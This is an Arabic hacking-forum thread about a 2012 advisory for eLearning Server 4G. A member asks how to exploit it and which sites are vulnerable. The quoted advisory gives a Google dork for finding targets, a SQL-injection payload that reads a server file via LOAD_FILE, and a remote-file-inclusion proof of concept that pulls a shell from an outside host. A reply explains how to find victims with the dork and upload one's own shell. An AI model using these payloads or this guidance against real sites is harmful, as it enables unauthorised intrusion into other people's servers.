| اقتباس | | | | | المشاركة الأصلية كتبت بواسطة qasim | | | | | | | | السلام عليكم ايها الاحبه لي الشرف ان اكون بينكم وقد تعلمت الكثير في هذه الفتره القصيره من بدايتي لدي سؤال وارجو من اهل الخبره المساعده هذا هو الدورك الجديد للثغره الجديده كيف ممكن استغلها اريد شرح بالصور واي موقع مصاب بهذه الثغره حتى تعم الفائده للجميع http://cxsecurity.com/issue/WLB-2012050086 # Exploit Title: eLearning Server Multiple Remote Vulnerabilities # Google Dork: intitle:"eLearning Server" # Date: 10.05.2012 # Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru) # Software Link: http://www.hypermethod.ru/ # Version: 4G # Tested on: Microsoft Windows news.php4 "nid" SQL injection: POC: /news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20File s\\Hypermethod\\eLearningServer\\index.php'),4,5,6 ,7,8 ,9,10,11/* admin/setup.inc.php Remote file Include POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt? | | | | | |
حبيبى
الثغرة هذه من نوع SQL وهو يسمى بحقن قواعد البيانات
إذا لم تكن لديك خلفية او معرفة حول هذا النوع ابحث فى اسام المنتدى ستجد قسم خاص ملىء بالشروحات المختصة بهذا القسم
إذا كانت لك خلفية حول هذه الثغرة فإليك شرح الثغرة
الثغرة تطبق على الاصدار الرابع من PHP المواقع المصابة ،،،والدورك هو كود البحث عن هذه المواقع فى محركات البحث ،،،كود الاستغلال الموجود يمكنك من رفع الشيل الخاص بك بسهولة بعد لصقه بعد عنوان الموقع ثم بعدها تضع علامة = وتضع رابط الشيل الخاص بك
وكما هو مكتوب تم اختباره على سيرفر من نوع وندوز